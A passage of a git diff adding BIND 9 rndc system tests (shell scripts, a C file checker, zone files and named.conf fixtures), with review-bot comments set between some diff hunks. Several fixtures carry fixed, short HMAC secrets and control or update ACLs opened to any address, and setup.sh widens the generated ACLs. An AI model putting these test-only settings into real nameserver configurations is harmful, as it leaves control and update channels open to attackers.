+# Check the total number of findname() calls triggered by a single query +# for large-referral.example.net/A. +findname_call_count="$(grep -c "large-referral\.example\.net.*FINDNAME" ns1/named.run)" +if [ "${findname_call_count}" -gt 1000 ]; then + echo_i "failed: ${findname_call_count} (> 1000) findname() calls detected for large-referral.example.net" + ret=1 +fi +# Check whether the limit of NS RRs processed for any delegation +# encountered was not exceeded. 
+if grep -Eq "dns_adb_createfind: started (A|AAAA) fetch for name ns21.fake.redirect.com" ns1/named.run; then + echo_i "failed: unexpected address fetch(es) were triggered for ns21.fake.redirect.com" + ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking query resolution for a domain with a valid glueless delegation chain ($n)" +ret=0 +rndccmd 10.53.0.1 flush || ret=1 +dig_with_opts foo.bar.sub.tld1 @10.53.0.1 TXT > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +grep "IN.*TXT.*baz" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check that correct namespace is chosen for dual-stack-servers ($n)" +ret=0 +# +# The two priming queries are needed until we fix dual-stack-servers fully +# +dig_with_opts @fd92:7065:b8e:ffff::9 v4.nameserver A > dig.out.prime1.${n} || ret=1 +dig_with_opts @fd92:7065:b8e:ffff::9 v4.nameserver AAAA > dig.out.prime2.${n} || ret=1 +dig_with_opts @fd92:7065:b8e:ffff::9 foo.v4only.net A > dig.out.ns9.${n} || ret=1 +grep "status: NOERROR" dig.out.ns9.${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "check expired TTLs with qtype * (${n})" +ret=0 +dig_with_opts +tcp @10.53.0.5 mixedttl.tld any > dig.out.1.${n} || ret=1 +ttl1=$(awk '$1 == "mixedttl.tld." && $4 == "A" { print $2 + 1 }' dig.out.1.${n}) +# sleep TTL + 1 so that record has expired +sleep "${ttl1:-0}" +dig_with_opts +tcp @10.53.0.5 mixedttl.tld any > dig.out.2.${n} || ret=1 +# check preconditions +grep "ANSWER: 3," dig.out.1.${n} > /dev/null || ret=1 +lines=$(awk '$1 == "mixedttl.tld." && $2 > 30 { print }' dig.out.1.${n} | wc -l) +test ${lines:-1} -ne 0 && ret=1 +# check behaviour (there may be 1 answer on very slow machines) +grep "ANSWER: [12]," dig.out.2.${n} > /dev/null || ret=1 +lines=$(awk '$1 == "mixedttl.tld." 
&& $2 > 30 { print }' dig.out.2.${n} | wc -l) +test ${lines:-1} -ne 0 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rndc/Makefile.in b/bin/tests/system/rndc/Makefile.in new file mode 100644 index 0000000..a17c5df --- /dev/null +++ b/bin/tests/system/rndc/Makefile.in @@ -0,0 +1,48 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +CINCLUDES = ${ISC_INCLUDES} + +CDEFINES = +CWARNINGS = + +ISCLIBS = ../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@ + +DNSDEPLIBS = +ISCDEPLIBS = ../../../../lib/isc/libisc.@A@ + +DEPLIBS = + +LIBS = @LIBS@ + +TARGETS = gencheck@EXEEXT@ + +GENCHECKOBJS = gencheck.@O@ + +SRCS = gencheck.c + +@BIND9_MAKE_RULES@ + +all: gencheck@EXEEXT@ + +gencheck@EXEEXT@: ${GENCHECKOBJS} ${ISCDEPLIBS} + ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ ${GENCHECKOBJS} ${ISCLIBS} ${LIBS} + +clean distclean:: + rm -f ${TARGETS} diff --git a/bin/tests/system/rndc/clean.sh b/bin/tests/system/rndc/clean.sh new file mode 100644 index 0000000..d18b5a5 --- /dev/null +++ b/bin/tests/system/rndc/clean.sh 
@@ -0,0 +1,33 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out.*.test*
+rm -f ns*/named.lock
+rm -f ns*/named.memstats
+rm -f ns*/named.run ns*/named.run.prev
+rm -f ns2/named.stats
+rm -f ns2/nil.db ns2/other.db ns2/static.db ns2/*.jnl
+rm -f ns2/session.key
+rm -f ns3/named_dump.db*
+rm -f ns4/*.nta
+rm -f ns4/example.db ns4/example.db.jnl
+rm -f ns4/key?.conf
+rm -f ns6/huge.zone.db
+rm -f ns7/include.db ns7/test.db ns7/*.jnl
+rm -f ns7/named_dump.db*
+rm -f ns*/named.conf
+rm -f nsupdate.out.*.test*
+rm -f python.out.*.test*
+rm -f rndc.out.*.test*
+rm -f ns*/managed-keys.bind* ns*/*.mkeys*
+rm -f ns*/*.nta
diff --git a/bin/tests/system/rndc/gencheck.c b/bin/tests/system/rndc/gencheck.c
new file mode 100644
index 0000000..c0bd718
--- /dev/null
+++ b/bin/tests/system/rndc/gencheck.c
@@ -0,0 +1,90 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <unistd.h>
+
+#include <isc/print.h>
+
+#define USAGE "usage: gencheck <filename>\n"
+
+static int
+check(const char *buf, ssize_t count, size_t *start) {
+ const char chars[] = "abcdefghijklmnopqrstuvwxyz0123456789";
+ ssize_t i;
+
+ for (i = 0; i < count; i++, *start = (*start + 1) % (sizeof(chars) - 1))
+ {
+ /* Just ignore the trailing newline */
+ if (buf[i] == '\n') {
+ continue;
+ }
+ if (buf[i] != chars[*start]) {
+ return (0);
+ }
+ }
+
+ return (1);
+}
+
+int
+main(int argc, char **argv) {
+ int ret;
+ int fd;
+ ssize_t count;
+ char buf[1024];
+ size_t start;
+ size_t length;
+
+ ret = EXIT_FAILURE;
+ fd = -1;
+ length = 0;
+
+ if (argc != 2) {
+ fputs(USAGE, stderr);
+ goto out;
+ }
+
+ fd = open(argv[1], O_RDONLY);
+ if (fd == -1) {
+ goto out;
+ }
+
+ start = 0;
+ while ((count = read(fd, buf, sizeof(buf))) != 0) {
+ if (count < 0) {
+ goto out;
+ }
+
+ if (!check(buf, count, &start)) {
+ goto out;
+ }
+
+ length += count;
+ }
+
+ ret = EXIT_SUCCESS;
+
+out:
+ printf("%lu\n", (unsigned long)length);
+
+ if (fd != -1) {
+ close(fd);
+ }
+
+ return (ret);
+}
diff --git a/bin/tests/system/rndc/ns2/incl.db b/bin/tests/system/rndc/ns2/incl.db
new file mode 100644
index 0000000..bb8b343
--- /dev/null
+++ b/bin/tests/system/rndc/ns2/incl.db
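Review bot: In check() in gencheck.c, the `continue` taken for '\n' still runs the for-loop's increment expression, so `*start` advances on every newline and a newline is accepted at any offset, not only at the end of the file as the comment says. If only a final newline is meant to be tolerated, keep just `i++` in the loop header and put `*start = (*start + 1) % (sizeof(chars) - 1);` after the character comparison; whether the producer of the checked file relies on the current behaviour is not visible in this commit, so at minimum the comment should describe what the loop actually does. Separately, main() reaches `out:` silently when open() or read() fails, and a `perror(argv[1]);` before those `goto out` statements would make a failing system test easier to diagnose.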
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; Used for testing $INCLUDE
+$INCLUDE "static.db"
diff --git a/bin/tests/system/rndc/ns2/named.conf.in b/bin/tests/system/rndc/ns2/named.conf.in
new file mode 100644
index 0000000..1af5346
--- /dev/null
+++ b/bin/tests/system/rndc/ns2/named.conf.in
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+key secondkey {
+ secret "abcd1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; secondkey; };
+};
+
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "nil" {
+ type primary;
+ update-policy local;
+ file "nil.db";
+ ixfr-from-differences yes;
+};
+
+zone "other" {
+ type primary;
+ update-policy local;
+ file "other.db";
+};
+
+zone "static" {
+ type primary;
+ file "static.db";
+};
+
+zone "incl" {
+ type primary;
+ file "incl.db";
+};
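Review bot: In ns2/named.conf.in the `key rndc_key` and `key secondkey` clauses carry short, fixed secrets and the `controls` statement uses `allow { any; }`, with nothing in the file marking these as test-only values. That is reasonable for a fixture that listens only on 10.53.0.2, but a comment above the keys such as `/* Test fixture: fixed HMAC secrets and an open control ACL, for the 10.53.0.x test addresses only. */` would keep the block from being copied into a real configuration. The same applies to the ns3, ns5, ns6 and ns7 named.conf.in hunks, and to `allow-update { any; };` in the ns4 hunk.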
diff --git a/bin/tests/system/rndc/ns2/secondkey.conf b/bin/tests/system/rndc/ns2/secondkey.conf
new file mode 100644
index 0000000..1b6af7b
--- /dev/null
+++ b/bin/tests/system/rndc/ns2/secondkey.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ default-key "secondkey";
+};
+
+key secondkey {
+ secret "abcd1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/rndc/ns3/named.conf.in b/bin/tests/system/rndc/ns3/named.conf.in
new file mode 100644
index 0000000..378ab67
--- /dev/null
+++ b/bin/tests/system/rndc/ns3/named.conf.in
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+key secondkey {
+ secret "abcd1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+view all {
+ match-clients { any; };
+
+ recursion no;
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+};
+
+view none {
+ match-clients { none; };
+};
diff --git a/bin/tests/system/rndc/ns4/named.conf.in b/bin/tests/system/rndc/ns4/named.conf.in
new file mode 100644
index 0000000..6dc37ec
--- /dev/null
+++ b/bin/tests/system/rndc/ns4/named.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+};
+
+view normal {
+ match-clients { any; };
+
+ zone example {
+ type primary;
+ file "example.db";
+ allow-update { any; };
+ };
+};
+
+view "view with a space" {
+ match-clients { none; };
+ zone example {
+ in-view normal;
+ };
+};
diff --git a/bin/tests/system/rndc/ns5/named.conf.in b/bin/tests/system/rndc/ns5/named.conf.in
new file mode 100644
index 0000000..ef38b17
--- /dev/null
+++ b/bin/tests/system/rndc/ns5/named.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; } read-only yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/rndc/ns6/named.args b/bin/tests/system/rndc/ns6/named.args
new file mode 100644
index 0000000..9d7d03a
--- /dev/null
+++ b/bin/tests/system/rndc/ns6/named.args
@@ -0,0 +1,3 @@
+# teardown of a huge zone with tracing enabled takes way too long
+# -m none is set so that stop.pl does not timeout
+-D rndc-ns6 -X named.lock -m none -c named.conf -d 99 -g -U 4 -T maxcachesize=2097152
diff --git a/bin/tests/system/rndc/ns6/named.conf.in b/bin/tests/system/rndc/ns6/named.conf.in
new file mode 100644
index 0000000..5c35741
--- /dev/null
+++ b/bin/tests/system/rndc/ns6/named.conf.in
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.6; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
diff --git a/bin/tests/system/rndc/ns7/include.db.in b/bin/tests/system/rndc/ns7/include.db.in
new file mode 100644
index 0000000..011997b
--- /dev/null
+++ b/bin/tests/system/rndc/ns7/include.db.in
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 86400 IN SOA ns7 hostmaster 1 5 5 1814400 3600
+@ NS ns7
+ns7 A 10.53.0.7
+
+text1 TXT "include 1"
diff --git a/bin/tests/system/rndc/ns7/include2.db.in b/bin/tests/system/rndc/ns7/include2.db.in
new file mode 100644
index 0000000..e5d1981
--- /dev/null
+++ b/bin/tests/system/rndc/ns7/include2.db.in
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 86400 IN SOA ns7 hostmaster 4 5 5 1814400 3600
+@ NS ns7
+ns7 A 10.53.0.7
+
+text1 TXT "include 2"
diff --git a/bin/tests/system/rndc/ns7/named.conf.in b/bin/tests/system/rndc/ns7/named.conf.in
new file mode 100644
index 0000000..adca731
--- /dev/null
+++ b/bin/tests/system/rndc/ns7/named.conf.in
@@ -0,0 +1,57 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { none; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+key int {
+ algorithm @DEFAULT_HMAC@;
+ secret "FrSt77yPTFx6hTs4i2tKLB9LmE0=";
+};
+
+key ext {
+ algorithm @DEFAULT_HMAC@;
+ secret "FrSt77yPTFx6hTs4i2tKLB9LmE0=";
+};
+
+controls {
+ inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+view internal {
+ match-clients { key "int"; };
+
+ zone "test" {
+ type primary;
+ update-policy { grant int zonesub any; };
+ file "test.db";
+ ixfr-from-differences yes;
+ };
+};
+
+view external {
+ match-clients { key "ext"; };
+
+ zone "test" {
+ in-view internal;
+ };
+};
diff --git a/bin/tests/system/rndc/ns7/test.db.in b/bin/tests/system/rndc/ns7/test.db.in
new file mode 100644
index 0000000..0bff14e
--- /dev/null
+++ b/bin/tests/system/rndc/ns7/test.db.in
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+$INCLUDE "include.db"
diff --git a/bin/tests/system/rndc/setup.sh b/bin/tests/system/rndc/setup.sh
new file mode 100644
index 0000000..7292818
--- /dev/null
+++ b/bin/tests/system/rndc/setup.sh
@@ -0,0 +1,57 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL ../genzone.sh 2 >ns2/nil.db
+$SHELL ../genzone.sh 2 >ns2/other.db
+$SHELL ../genzone.sh 2 >ns2/static.db
+$SHELL ../genzone.sh 2 >ns4/example.db
+
+cp ns7/test.db.in ns7/test.db
+cp ns7/include.db.in ns7/include.db
+
+$SHELL ../genzone.sh 2 >ns6/huge.zone.db
+awk 'END { for (i = 1; i <= 1000000; i++)
+ printf "host%d IN A 10.53.0.6\n", i; }' < /dev/null >> ns6/huge.zone.db
+
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+
+make_key () {
+ $RNDCCONFGEN -k key$1 -A $3 -s 10.53.0.4 -p $2 \
+ > ns4/key${1}.conf 2> /dev/null
+ grep -E -v '(^# Start|^# End|^# Use|^[^#])' ns4/key$1.conf | cut -c3- | \
+ sed 's/allow { 10.53.0.4/allow { any/' >> ns4/named.conf
+}
+
+$FEATURETEST --md5 && make_key 1 ${EXTRAPORT1} hmac-md5
+make_key 2 ${EXTRAPORT2} hmac-sha1
+make_key 3 ${EXTRAPORT3} hmac-sha224
+make_key 4 ${EXTRAPORT4} hmac-sha256
+make_key 5 ${EXTRAPORT5} hmac-sha384
+make_key 6 ${EXTRAPORT6} hmac-sha512
+
+cat >> ns4/named.conf <<- EOF
+
+controls {
+ inet 10.53.0.4 port ${EXTRAPORT7}
+ allow { any; } keys { "key1"; "key2"; "key3";
+ "key4"; "key5"; "key6"; };
+};
+EOF
diff --git a/bin/tests/system/rndc/tests.sh b/bin/tests/system/rndc/tests.sh
new file mode 100644
index 0000000..4c40062
--- /dev/null
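Review bot: `make_key` in setup.sh hides rndc-confgen failures: stderr is sent to /dev/null and the exit status is never checked, so a failed run leaves an empty `ns4/key$1.conf` and appends nothing to ns4/named.conf. The failure would then presumably show up only later, as rndc authentication errors in tests.sh. Dropping `2> /dev/null` and ending that command with `|| exit 1` would surface it at setup time, assuming the test runner treats a failing setup.sh as an error. The `sed` that rewrites `allow { 10.53.0.4` to `allow { any` also deserves a one-line comment such as `# widen the generated control ACL; test-only`, since it loosens what rndc-confgen emits.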
+++ b/bin/tests/system/rndc/tests.sh 
@@ -0,0 +1,839 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd" +DIGOPTS="" +DIGCMD="$DIG $DIGOPTS -p ${PORT}" +RNDCCMD="$RNDC -p ${CONTROLPORT} -c ../common/rndc.conf -s" + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "preparing ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > /dev/null 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text1.nil. 600 IN TXT "addition 1" +send +zone other. +update add text1.other. 600 IN TXT "addition 1" +send +END +[ -s ns2/nil.db.jnl ] || { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +[ -s ns2/other.db.jnl ] || { + echo_i "'test -s ns2/other.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "rndc freeze" +$RNDCCMD 10.53.0.2 freeze | sed 's/^/ns2 /' | cat_i + +n=`expr $n + 1` +echo_i "checking zone was dumped ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "addition 1" ns2/nil.db > /dev/null && break + sleep 1 +done +grep "addition 1" ns2/nil.db > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking journal file is still present ($n)" +ret=0 +[ -s ns2/nil.db.jnl ] || { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking zone not writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > 
/dev/null 2>&1 <<END && ret=1 +server 10.53.0.2 +zone nil. +update add text2.nil. 600 IN TXT "addition 2" +send +END + +$DIGCMD @10.53.0.2 text2.nil. TXT > dig.out.1.test$n +grep 'addition 2' dig.out.1.test$n >/dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "rndc thaw" +$RNDCCMD 10.53.0.2 thaw | sed 's/^/ns2 /' | cat_i + +n=`expr $n + 1` +echo_i "checking zone now writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.1.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text3.nil. 600 IN TXT "addition 3" +send +END +$DIGCMD @10.53.0.2 text3.nil. TXT > dig.out.1.test$n +grep 'addition 3' dig.out.1.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "rndc sync" +ret=0 +$RNDCCMD 10.53.0.2 sync nil | sed 's/^/ns2 /' | cat_i + +n=`expr $n + 1` +echo_i "checking zone was dumped ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "addition 3" ns2/nil.db > /dev/null && break + sleep 1 +done +grep "addition 3" ns2/nil.db > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking journal file is still present ($n)" +ret=0 +[ -s ns2/nil.db.jnl ] || { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking zone is still writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.1.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text4.nil. 600 IN TXT "addition 4" +send +END + +$DIGCMD @10.53.0.2 text4.nil. 
TXT > dig.out.1.test$n +grep 'addition 4' dig.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "rndc sync -clean" +ret=0 +$RNDCCMD 10.53.0.2 sync -clean nil | sed 's/^/ns2 /' | cat_i + +n=`expr $n + 1` +echo_i "checking zone was dumped ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "addition 4" ns2/nil.db > /dev/null && break + sleep 1 +done +grep "addition 4" ns2/nil.db > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking journal file is deleted ($n)" +ret=0 +[ -s ns2/nil.db.jnl ] && { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking zone is still writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > /dev/null 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text5.nil. 600 IN TXT "addition 5" +send +END + +$DIGCMD @10.53.0.2 text4.nil. 
TXT > dig.out.1.test$n +grep 'addition 4' dig.out.1.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking other journal files not removed ($n)" +ret=0 +[ -s ns2/other.db.jnl ] || { + echo_i "'test -s ns2/other.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "cleaning all zones ($n)" +$RNDCCMD 10.53.0.2 sync -clean | sed 's/^/ns2 /' | cat_i + +n=`expr $n + 1` +echo_i "checking all journals removed ($n)" +ret=0 +[ -s ns2/nil.db.jnl ] && { + echo_i "'test -s ns2/nil.db.jnl' succeeded when it shouldn't have"; ret=1; +} +[ -s ns2/other.db.jnl ] && { + echo_i "'test -s ns2/other.db.jnl' succeeded when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that freezing static zones is not allowed ($n)" +ret=0 +$RNDCCMD 10.53.0.2 freeze static > rndc.out.1.test$n 2>&1 +grep 'not dynamic' rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + 